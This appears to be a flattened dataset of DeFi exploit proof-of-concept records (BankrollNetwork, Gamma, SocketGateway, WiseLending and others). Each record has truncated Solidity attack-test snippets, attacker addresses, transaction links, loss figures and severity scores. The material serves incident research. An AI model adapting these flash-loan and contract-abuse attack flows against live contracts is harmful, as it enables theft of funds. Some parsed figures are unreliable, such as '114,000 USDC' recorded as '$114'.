https://x.com/Phalcon_xyz/status/1943518566831296566
https://x.com/TenArmorAlert/status/1935618109802459464
true
true
false
low
24.5 WBNB
unknown
function testExploit() public balanceLog { emit log_named_decimal_uint("[Begin] Attacker WBNB before exploit", WBNB.balanceOf(address(this)), 18); borrow_amount = 2_000 ether; pair.swap(0, borrow_amount, address(this), "0x3030"); emit log_named_decimal_uint("[End] Attacker WBNB after e...
true
24.5 WBNB
https://bscscan.com/address/0x2dea406bb3bea68d6be8d9ef0071fdf63082fb52
https://bscscan.com/address/0xe63a5c681cacb8484c8a989cfdd41b8e3b7a2be2
https://bscscan.com/address/0xAdEfb902CaB716B8043c5231ae9A50b8b4eE7c4e
https://bscscan.com/tx/0x7226b3947c7e8651982e5bd777bca52d03ea31d19b515dec123595a4435ae22c
https://x.com/Phalcon_xyz/status/1943518566831296566
https://x.com/TenArmorAlert/status/1935618109802459464
$24
7.71
medium
BankrollNetwork Exploit (2025-06)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 16.5k USD // Attacker : https://bscscan.com/address/0xc49f2938327aa2cdc3f2f89ed17b54b3671f05de // Attack Contract : https://bscscan.com/address/0x982769c5e5dd77f8308e3cd6eec3...
exploit_poc
Gangsterfinance
2025-06
Gangsterfinance_exp.sol
null
c289647f9141ca09
2026-01-07T10:59:16.528221
postmortems
bsc
null
16.5k USD
16,500
https://bscscan.com/address/0xc49f2938327aa2cdc3f2f89ed17b54b3671f05de
https://bscscan.com/address/0x982769c5e5dd77f8308e3cd6eec37da9d8237dc6
https://bscscan.com/address/0xe968d2e4adc89609773571301abec3399d163c3b
https://bscscan.com/tx/0xf34e59e4fe2c9b454d2b73a1a3f3aaf07d484a0c71ff8278b1c068cdedc4b64d
null
null
true
true
false
medium
16.5k USD
unknown
function testExploit() public balanceLog { IUniswapV2Pair(CAKE_LP).swap(borrowAmount, 0, address(this), new bytes(1)); }
true
16.5k USD
https://bscscan.com/address/0xc49f2938327aa2cdc3f2f89ed17b54b3671f05de
https://bscscan.com/address/0x982769c5e5dd77f8308e3cd6eec37da9d8237dc6
https://bscscan.com/address/0xe968d2e4adc89609773571301abec3399d163c3b
https://bscscan.com/tx/0xf34e59e4fe2c9b454d2b73a1a3f3aaf07d484a0c71ff8278b1c068cdedc4b64d
$16.5K
7.26
medium
Gangsterfinance Exploit (2025-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 5k USD // Attacker : https://bscscan.com/address/0x172dca3e72e4643ce8b7932f4947347c1e49ba6d // Attack Contract : 0x92c56dd0c9eee1da9f68f6e0f70c4a77de7b2b3c // Vulnerable Con...
exploit_poc
BankrollStack
2025-06
BankrollStack_exp.sol
null
db47a04307148603
2026-01-07T10:59:16.528266
postmortems
bsc
null
5k USD
5,000
https://bscscan.com/address/0x172dca3e72e4643ce8b7932f4947347c1e49ba6d
null
null
https://bscscan.com/tx/0x0706425beba4b3f28d5a8af8be26287aa412d076828ec73d8003445c087af5fd
https://x.com/Phalcon_xyz/status/1943518566831296566
https://x.com/TenArmorAlert/status/1935618109802459464
true
true
false
low
5k USD
unknown
function testExploit() public balanceLog { IPancakeV3Pool(PancakeV3Pool).flash(address(this), 0, flashAmount, "0x00"); }
true
5k USD
https://bscscan.com/address/0x172dca3e72e4643ce8b7932f4947347c1e49ba6d
https://bscscan.com/tx/0x0706425beba4b3f28d5a8af8be26287aa412d076828ec73d8003445c087af5fd
https://x.com/Phalcon_xyz/status/1943518566831296566
https://x.com/TenArmorAlert/status/1935618109802459464
$5.0K
6.23
medium
BankrollStack Exploit (2025-06)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 2M USD // Attacker : https://bscscan.com/address/0xd5c6f3b71bcceb2ef8332bd8225f5f39e56a122c // Attack Contract : https://bscscan.com/address/0x7c2565b563e057d482be2bf77796047e5340c57a // Vulnerable Contract : h...
exploit_poc
unverified_b5cb
2025-06
unverified_b5cb_exp.sol
null
361472be6b223b58
2026-01-07T10:59:16.528334
postmortems
bsc
52,052,680
2M USD
2,000,000
https://bscscan.com/address/0xd5c6f3b71bcceb2ef8332bd8225f5f39e56a122c
https://bscscan.com/address/0x7c2565b563e057d482be2bf77796047e5340c57a
https://bscscan.com/address/0xb5cb0555a1d28c9dfdbc14017dae131d5c1cc19c
https://app.blocksec.com/explorer/tx/bsc/0x8c026c3939f7e2d0376d13e30859fa918a5a567348ca1329836df88bef30c73e
https://x.com/TenArmorAlert/status/1937761064713941187
https://x.com/TenArmorAlert/status/1937761064713941187
true
true
false
critical
2M USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c).balanceOf(attacker), 18); emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x2170Ed0880ac9A755fd29B2688956BD959F933F8).balanceOf(attack...
true
2M USD
https://bscscan.com/address/0xd5c6f3b71bcceb2ef8332bd8225f5f39e56a122c
https://bscscan.com/address/0x7c2565b563e057d482be2bf77796047e5340c57a
https://bscscan.com/address/0xb5cb0555a1d28c9dfdbc14017dae131d5c1cc19c
https://app.blocksec.com/explorer/tx/bsc/0x8c026c3939f7e2d0376d13e30859fa918a5a567348ca1329836df88bef30c73e
https://x.com/TenArmorAlert/status/1937761064713941187
https://x.com/TenArmorAlert/status/1937761064713941187
$2.00M
9
high
unverified_b5cb Exploit (2025-06)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 14.8K USD // Attacker : 0x5d4430d14ae1d11526ddac1c1ef01da3b1dae455 // Attack Contract : https://etherscan.io/address/0x8fa5cf0aa8af0e5adc7b43746ea033ca1b8e68de // Vulnerable Contract : // Attack Tx : https://a...
exploit_poc
AAVEBoost
2025-06
AAVEBoost_exp.sol
null
64e10590cfb1e432
2026-01-07T10:59:16.528417
postmortems
ethereum
22,685,443
14.8K USD
14,800
null
https://etherscan.io/address/0x8fa5cf0aa8af0e5adc7b43746ea033ca1b8e68de
null
https://app.blocksec.com/explorer/tx/eth/0xc4ef3b5e39d862ffcb8ff591fbb587f89d9d4ab56aec70cfb15831782239c0ce
https://x.com/CertiKAlert/status/1933011428157563188
https://x.com/CertiKAlert/status/1933011428157563188
true
true
false
medium
14.8K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9).balanceOf(attacker), 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); deal(address(0x7Fc66500c84A76Ad7e9c93437bFc5Ac33...
true
14.8K USD
https://etherscan.io/address/0x8fa5cf0aa8af0e5adc7b43746ea033ca1b8e68de
https://app.blocksec.com/explorer/tx/eth/0xc4ef3b5e39d862ffcb8ff591fbb587f89d9d4ab56aec70cfb15831782239c0ce
https://x.com/CertiKAlert/status/1933011428157563188
https://x.com/CertiKAlert/status/1933011428157563188
$14.8K
6.7
medium
AAVEBoost Exploit (2025-06)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 48.3K USD // Attacker : 0x7248939f65bdd23aab9eaab1bc4a4f909567486e // Attack Contract : https://etherscan.io/address/0xc59d50e26aee2ca34ae11f08924c0bc619728e7c // Vulnerable Contract : // Attack Tx : https://b...
exploit_poc
unverified_8490
2025-06
unverified_8490_exp.sol
null
4de54a6591e516f3
2026-01-07T10:59:16.528473
postmortems
ethereum
51,190,821
48.3K USD
48,300
null
https://etherscan.io/address/0xc59d50e26aee2ca34ae11f08924c0bc619728e7c
null
https://bscscan.com/tx/0x9191153c8523d97f3441a08fef1da5e4169d9c2983db9398364071daa33f59d1
https://x.com/TenArmorAlert/status/1932309011564781774
https://x.com/TenArmorAlert/status/1932309011564781774
true
true
false
medium
48.3K USD
unknown
function testPoC() public { vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of address(attC)", IERC20(TransparentUpgradeableProxy).balanceOf(address(attC)), 18); } } contra...
true
48.3K USD
https://etherscan.io/address/0xc59d50e26aee2ca34ae11f08924c0bc619728e7c
https://bscscan.com/tx/0x9191153c8523d97f3441a08fef1da5e4169d9c2983db9398364071daa33f59d1
https://x.com/TenArmorAlert/status/1932309011564781774
https://x.com/TenArmorAlert/status/1932309011564781774
$48.3K
7.03
medium
unverified_8490 Exploit (2025-06)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IERC20Custom { function transfer(address, uint256) external; } /* Vulnerable contract: https://etherscan.io/token/0xc0A6B8c534FaD86dF8FA1AbB17084A70F86EDDc1#code root cause:...
exploit_poc
Nimbus
2021-09
Nimbus_exp.sol
null
365ec871b6414be5
2026-01-07T10:59:16.528522
postmortems
ethereum
13,225,516
null
null
null
null
https://etherscan.io/token/0xc0A6B8c534FaD86dF8FA1AbB17084A70F86EDDc1#code
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { console.log("Before exploiting", IERC20(usdt).balanceOf(address(this))); uint256 amount = IERC20(usdt).balanceOf(pair) * 99 / 100; IUniswapV2Pair(pair).swap(amount, 0, address(this), abi.encodePacked(amount)); console.log("After exploiting", IERC20(usdt)...
true
Unknown
3.8
low
Nimbus Exploit (2021-09)
false
true
false
false
// SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "./../interface.sol"; /* Attacker: 0x2708cace7b42302af26f1ab896111d87faeff92f Attack tx: https://etherscan.io/tx/0x96bf6bd14a81cf19939c0b966389daed778c3a9528a6c5dd7a4d980dec966388 Affected contracts: 0...
exploit_poc
DaoMaker
2021-09
DaoMaker_exp.sol
null
9789092059e7f128
2026-01-07T10:59:16.528563
postmortems
ethereum
13,155,320
null
null
null
null
null
https://etherscan.io/tx/0x96bf6bd14a81cf19939c0b966389daed778c3a9528a6c5dd7a4d980dec966388
null
null
false
false
false
medium
null
unknown
function testExploit() public { uint256[] memory releasePeriods = new uint256[](1); releasePeriods[0] = 5_702_400; uint256[] memory releasePercents = new uint256[](1); releasePercents[0] = 10_000; emit log_named_decimal_uint("Before exploiting, Attacker DERC balance", DERC.balan...
true
Unknown
4.05
low
DaoMaker Exploit (2021-09)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; interface IDutchAuction { function commitEth( address payable _beneficiary, bool readAndAgre...
exploit_poc
Sushimiso
2021-09
Sushimiso_exp.sol
null
d3b04de1a58b50c2
2026-01-07T10:59:16.528604
postmortems
unknown
13,038,771
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { payable(address(0)).transfer(79_228_162_414_264_337_593_543_950_335); emit log_named_uint("Before exploit, ETH balance of attacker:", address(address(this)).balance); emit log_named_uint("Before exploit, ETH balance of DutchAuction:", address(DutchAuction).balance...
true
Unknown
2.96
low
Sushimiso Exploit (2021-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IERC20Custom { function transfer(address, uint256) external; } /* Vulnerable contract: https://etherscan.io/address/0xa14660a33cc608b902f5bb49c8213bd4c8a4f4ca#code unverified con...
exploit_poc
NowSwap
2021-09
NowSwap_exp.sol
null
4e100dacb1843374
2026-01-07T10:59:16.528644
postmortems
ethereum
13,225,516
null
null
null
null
https://etherscan.io/address/0xa14660a33cc608b902f5bb49c8213bd4c8a4f4ca#code
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { console.log("Before exploiting", IERC20(nbu).balanceOf(address(this))); uint256 amount = IERC20(nbu).balanceOf(pair) * 99 / 100; IUniswapV2Pair(pair).swap(0, amount, address(this), abi.encodePacked(amount)); console.log("After exploiting", IERC20(nbu).b...
true
Unknown
3.66
low
NowSwap Exploit (2021-09)
false
true
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://slowmist.medium.com/brief-analysis-of-zabu-finance-being-hacked-44243919ea29 interface ZABUFarm { function deposit(uint256 _pid, uint256 _amount) external; function withdraw(uint256 _pid, uint256 _amoun...
exploit_poc
ZABU
2021-09
ZABU_exp.sol
null
385381ce4fc0b780
2026-01-07T10:59:16.528696
postmortems
unknown
4,177,751
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public payable { SPORE.approve(address(Farm), type(uint256).max); WAVAX.approve(address(Router), type(uint256).max); (reserve0Pair1, reserve1Pair1,) = PangolinPair1.getReserves(); (reserve0Pair2, reserve1Pair2,) = PangolinPair2.getReserves(); address(WAVAX)...
true
Unknown
5
medium
ZABU Exploit (2021-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$180K // Attacker : https://optimistic.etherscan.io/address/0x1fd0a6a5e232eeba8020a40535ad07013ec4ef12 // Attack Contracts : https://optimistic.etherscan.io/address/0xe...
exploit_poc
NBLGAME
2024-01
NBLGAME_exp.sol
flash_loan
58b8409546c374f8
2026-01-07T10:59:16.528758
postmortems
ethereum
115,293,068
~$180K
180,000
https://optimistic.etherscan.io/address/0x1fd0a6a5e232eeba8020a40535ad07013ec4ef12
null
null
https://app.blocksec.com/explorer/tx/optimism/0xf4fc3b638f1a377cf22b729199a9aeb27fc62fe2983a65c4d14b99ee5c5b2328
null
null
true
true
true
high
~$180K
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Exploiter USDT balance before attack", USDT.balanceOf(address(this)), USDT.decimals() ); emit log_named_decimal_uint( "Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals() ...
true
~$180K
https://optimistic.etherscan.io/address/0x1fd0a6a5e232eeba8020a40535ad07013ec4ef12
https://app.blocksec.com/explorer/tx/optimism/0xf4fc3b638f1a377cf22b729199a9aeb27fc62fe2983a65c4d14b99ee5c5b2328
$180.0K
9
high
NBLGAME Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$1K // Attacker : https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c6706c3c0e17b10397 // Attack Contracts : https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c67...
exploit_poc
PeapodsFinance
2024-01
PeapodsFinance_exp.sol
null
268c08149c461131
2026-01-07T10:59:16.528821
postmortems
ethereum
19,109,653
~$1K
1,000
https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c6706c3c0e17b10397
null
null
https://app.blocksec.com/explorer/tx/eth/0x95c1604789c93f41940a7fd9eca11276975a9a65d250b89a247736287dbd2b7e
null
null
true
false
false
low
~$1K
unknown
function testExploit() public { deal(address(DAI), address(this), 200e18); emit log_named_decimal_uint("Exploiter DAI balance before attack", DAI.balanceOf(address(this)), DAI.decimals()); uint8 i; while (i < 20) { DAI.approve(address(ppPP), 10e18); ppPP.flash(ad...
true
~$1K
https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c6706c3c0e17b10397
https://app.blocksec.com/explorer/tx/eth/0x95c1604789c93f41940a7fd9eca11276975a9a65d250b89a247736287dbd2b7e
$1.0K
6.74
medium
PeapodsFinance Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~$319K // Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd // Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc...
exploit_poc
DAO_SoulMate
2024-01
DAO_SoulMate_exp.sol
access_control
27c0a26d49c28361
2026-01-07T10:59:16.528875
postmortems
ethereum
19,063,676
~$319K
319,000
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
null
https://app.blocksec.com/explorer/tx/eth/0x1ea0a2e88efceccb2dd93e6e5cb89e5421666caeefb1e6fc41b68168373da342
null
null
true
true
true
high
~$319K
access-control
function testExploit() public { emit log_named_decimal_uint( "Exploiter USDC balance before attack", USDC.balanceOf(address(this)), USDC.decimals() ); emit log_named_decimal_uint("Exploiter DAI balance before attack", DAI.balanceOf(address(this)), DAI.decimals()); emit log_na...
true
~$319K
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://app.blocksec.com/explorer/tx/eth/0x1ea0a2e88efceccb2dd93e6e5cb89e5421666caeefb1e6fc41b68168373da342
$319.0K
8.03
high
DAO_SoulMate Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.20; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~464K USD$ // Attacker : https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc // Attack Contract : https://etherscan.io/address/0x91c49cc7fbfe8f70acee...
exploit_poc
WiseLending03
2024-01
WiseLending03_exp.sol
null
81dffe5fc637b842
2026-01-07T10:59:16.528947
postmortems
ethereum
null
~464K USD$
464,000
https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc
https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c
https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4
https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31
null
null
true
true
false
high
~464K USD$
unknown
function testExploit() public { deal(address(PendleLPT), address(this), 520_539_781_914_590_517_894); emit log_named_decimal_uint("Attacker PendleLPT Balance before exploit", PendleLPT.balanceOf(address(this)), 18); PendleLPT.approve(address(LPTPoolToken), type(uint256).max); LPTPoolTo...
true
~464K USD$
https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc
https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c
https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4
https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31
$464.0K
9
high
WiseLending03 Exploit (2024-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; // @Info // LQDX LiquidXv2Zap Contract : https://etherscan.io/address/0x364f17a23ae4350319b7491224d10df5796190bc#codeL490 // @NewsTrack // SlowMist : https://twitter.com/SlowMist_Team/status/1744972012865671452 // Note: the...
exploit_poc
LQDX_alert
2024-01
LQDX_alert_exp.sol
null
13433be766e89bb4
2026-01-07T10:59:16.529022
postmortems
ethereum
19,165,893
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { vm.startPrank(attacker); (uint112 lqdx_before, uint112 weth_before,) = WETH_LQDX_pair.getReserves(); emit log_named_uint("before attack, LQDX in the pool", lqdx_before / 1 ether); emit log_named_uint("before attack, WETH in the pool", weth_before / 1 ether...
true
Unknown
3.9
low
LQDX_alert Exploit (2024-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.22; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~$6.3m // Attacker : 0x5351536145610aa448a8bf85ba97c71caf31909c // Attack Contract : 0xfd42cba85f6567fef32bab24179de21b9851b63e // Vulnerable Contract : 0x1F1Ca4e8236CD13032653391dB7e9544a6ad123E //...
exploit_poc
Gamma
2024-01
Gamma_exp.sol
flash_loan
5b09b099d0b041e2
2026-01-07T10:59:16.529070
postmortems
arbitrum
166,873,291
~$6.3m
6,300,000
null
null
null
https://arbiscan.io/tx/0x025cf2858723369d606ee3abbc4ec01eab064a97cc9ec578bf91c6908679be75
null
null
true
true
true
critical
~$6.3m
flash-loan
function testExploit() public { uint256 initial_balance = address(this).balance; I(usdt).approve(usdt_usdce_pool, type(uint256).max); I(usdce).approve(usdt_usdce_pool, type(uint256).max); I(weth_usdt_pool).flash(address(this), 0, 3_000_000_000_000, ""); I(weth_usdce_pool).swap( ...
true
~$6.3m
https://arbiscan.io/tx/0x025cf2858723369d606ee3abbc4ec01eab064a97cc9ec578bf91c6908679be75
$6.30M
9
high
Gamma Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$130K // Attacker : https://etherscan.io/address/0x7b3a6eff1c9925e509c2b01a389238c1fcc462b6 // Attack Contracts : https://etherscan.io/address/0x356e7481b957be0165d6751...
exploit_poc
BarleyFinance
2024-01
BarleyFinance_exp.sol
null
58373d2ea4e828b0
2026-01-07T10:59:16.529135
postmortems
ethereum
19,106,654
~$130K
130,000
https://etherscan.io/address/0x7b3a6eff1c9925e509c2b01a389238c1fcc462b6
null
null
https://app.blocksec.com/explorer/tx/eth/0x995e880635f4a7462a420a58527023f946710167ea4c6c093d7d193062a33b01
null
null
true
true
false
high
~$130K
unknown
function testExploit() public { // Start with 200 DAI tokens transferred from exploiter to attack contract in txs: // https://app.blocksec.com/explorer/tx/eth/0xa685928b5102349a5cc50527fec2e03cb136c233505471bdd4363d0ab077a69a // https://app.blocksec.com/explorer/tx/eth/0xaaa197c7478063eb1124c8d8...
true
~$130K
https://etherscan.io/address/0x7b3a6eff1c9925e509c2b01a389238c1fcc462b6
https://app.blocksec.com/explorer/tx/eth/0x995e880635f4a7462a420a58527023f946710167ea4c6c093d7d193062a33b01
$130.0K
7.07
medium
BarleyFinance Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~51K USD // TX : https://app.blocksec.com/explorer/tx/bsc/0xf477089602fefcfc1dbdce15834476267914d64a1e6a52f07d3f135f091e1d27 // Attacker : https://bscscan.com/address/0...
exploit_poc
XSIJ
2024-01
XSIJ_exp.sol
flash_loan
e9cf8528365c90ec
2026-01-07T10:59:16.529183
postmortems
bsc
35,702,095
~51K USD
51,000
https://bscscan.com/address/0xc4f82210c2952fcec77efe734ab2d9b14e858469
https://bscscan.com/address/0x5313f4f04fdcc2330ccfa5ba7da2780850d1d7be
null
null
null
null
true
false
true
medium
~51K USD
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Attacker USDT balance before exploit", BUSD.balanceOf(address(this)), BUSD.decimals() ); DPP.flashLoan(0, 100_000_000_000_000_000_000_000, address(this), new bytes(0x123)); emit log_named_decimal_uint( ...
true
https://bscscan.com/address/0xc4f82210c2952fcec77efe734ab2d9b14e858469
https://bscscan.com/address/0x5313f4f04fdcc2330ccfa5ba7da2780850d1d7be
$51.0K
6.48
medium
XSIJ Exploit (2024-01)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "../basetest.sol"; import "./../interface.sol"; interface ISocketGateway { function executeRoute(uint32 routeId, bytes calldata routeData) external payable returns (bytes memory); } interface ISocketVulnRoute { function performAction( ...
exploit_poc
SocketGateway
2024-01
SocketGateway_exp.sol
null
6608bf07d0a3bc94
2026-01-07T10:59:16.529231
postmortems
ethereum
19,021,453
~3.3M US$
3,300,000
https://etherscan.io/address/0x50DF5a2217588772471B84aDBbe4194A2Ed39066
https://etherscan.io/address/0xf2D5951bB0A4d14BdcC37b66f919f9A1009C05d1
https://etherscan.io/address/0x3a23F943181408EAC424116Af7b7790c94Cb97a5
https://etherscan.io/tx/0xc6c3331fa8c2d30e1ef208424c08c039a89e510df2fb6ae31e5aa40722e28fd6
https://twitter.com/BeosinAlert/status/1747450173675196674
https://twitter.com/peckshield/status/1747353782004900274
true
true
false
critical
~3.3M US$
unknown
function testExploit() public balanceLog { gateway.executeRoute(routeId, getRouteData(_usdc, targetUser)); require(USDC.balanceOf(address(this)) > 0, "no usdc gotten"); }
true
~3.3M US$
https://etherscan.io/address/0x50DF5a2217588772471B84aDBbe4194A2Ed39066
https://etherscan.io/address/0xf2D5951bB0A4d14BdcC37b66f919f9A1009C05d1
https://etherscan.io/address/0x3a23F943181408EAC424116Af7b7790c94Cb97a5
https://etherscan.io/tx/0xc6c3331fa8c2d30e1ef208424c08c039a89e510df2fb6ae31e5aa40722e28fd6
https://twitter.com/BeosinAlert/status/1747450173675196674
https://twitter.com/peckshield/status/1747353782004900274
$3.30M
7.45
medium
SocketGateway Exploit (2024-01)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.20; import {Test, console} from "forge-std/Test.sol"; import {IERC20} from "./../interface.sol"; // @KeyInfo - Total Lost : ~464K USD$ // Attacker : https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc // Attack Contract : https://ethersca...
exploit_poc
WiseLending02
2024-01
WiseLending02_exp.sol
oracle_manipulation
629a7c86976b4097
2026-01-07T10:59:16.529285
postmortems
ethereum
null
~464K USD$
464,000
https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc
https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c
https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4
https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31
null
null
true
true
true
high
~464K USD$
oracle-manipulation
function test_poc() public { deal(pendleLPT, address(this), 1 ether); IERC20(pendleLPT).approve(poolToken, MAX); Pool(poolToken).depositExactAmount(1 ether); IERC20(poolToken).approve(address(wiseLending), MAX); uint256 nftId = nft.mintPosition(); wiseLending.deposit...
true
~464K USD$
https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc
https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c
https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4
https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31
$464.0K
10
high
WiseLending02 Exploit (2024-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~74 $WBNB // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0x4512abb79f1f80830f4641caefc5ab33654a2d49 // Vulnerable Contract : https://bscscan....
exploit_poc
Freedom
2024-01
Freedom_exp.sol
flash_loan
f9448adf9cb9af3b
2026-01-07T10:59:16.529338
postmortems
bsc
35,123,711
~74 $WBNB
74
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x4512abb79f1f80830f4641caefc5ab33654a2d49
https://bscscan.com/address/0xae3ada8787245977832c6dab2d4474d3943527ab
https://bscscan.com/tx/0x309523343cc1bb9d28b960ebf83175fac941b4a590830caccff44263d9a80ff0
null
null
true
false
true
low
~74 $WBNB
flash-loan
function testExploit() public { emit log_named_uint("Attacker WBNB balance before attack:", WBNB.balanceOf(address(this))); WBNB.approve(address(Router), type(uint256).max); DODO.flashLoan(500 * 1e18, 0, address(this), new bytes(1)); emit log_named_uint("Attacker WBNB balance before atta...
true
~74 $WBNB
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x4512abb79f1f80830f4641caefc5ab33654a2d49
https://bscscan.com/address/0xae3ada8787245977832c6dab2d4474d3943527ab
https://bscscan.com/tx/0x309523343cc1bb9d28b960ebf83175fac941b4a590830caccff44263d9a80ff0
$74
8.7
high
Freedom Exploit (2024-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @KeyInfo - Total Lost: 114,000 USDC - Attacker: https://etherscan.io/address/0x63136677355840f26c0695dd6de5c9e4f514f8e8 - Attack Contract: https://etherscan.io/address/0xae59191...
exploit_poc
Bmizapper
2024-01
Bmizapper_exp.sol
null
a950bb4b747fa5cb
2026-01-07T10:59:16.529386
postmortems
ethereum
19,029,290
114,000 USDC
114
https://etherscan.io/address/0x63136677355840f26c0695dd6de5c9e4f514f8e8
https://etherscan.io/address/0xae5919160a646f5d80d89f7aae35a2ca74738440
null
https://app.blocksec.com/explorer/tx/eth/0x97201900198d0054a2f7a914f5625591feb6a18e7fc6bb4f0c964b967a6c15f6
null
null
true
false
false
low
114,000 USDC
unknown
false
114,000 USDC
https://etherscan.io/address/0x63136677355840f26c0695dd6de5c9e4f514f8e8
https://etherscan.io/address/0xae5919160a646f5d80d89f7aae35a2ca74738440
https://app.blocksec.com/explorer/tx/eth/0x97201900198d0054a2f7a914f5625591feb6a18e7fc6bb4f0c964b967a6c15f6
$114
4.55
low
Bmizapper Exploit (2024-01)
true
false
true
false
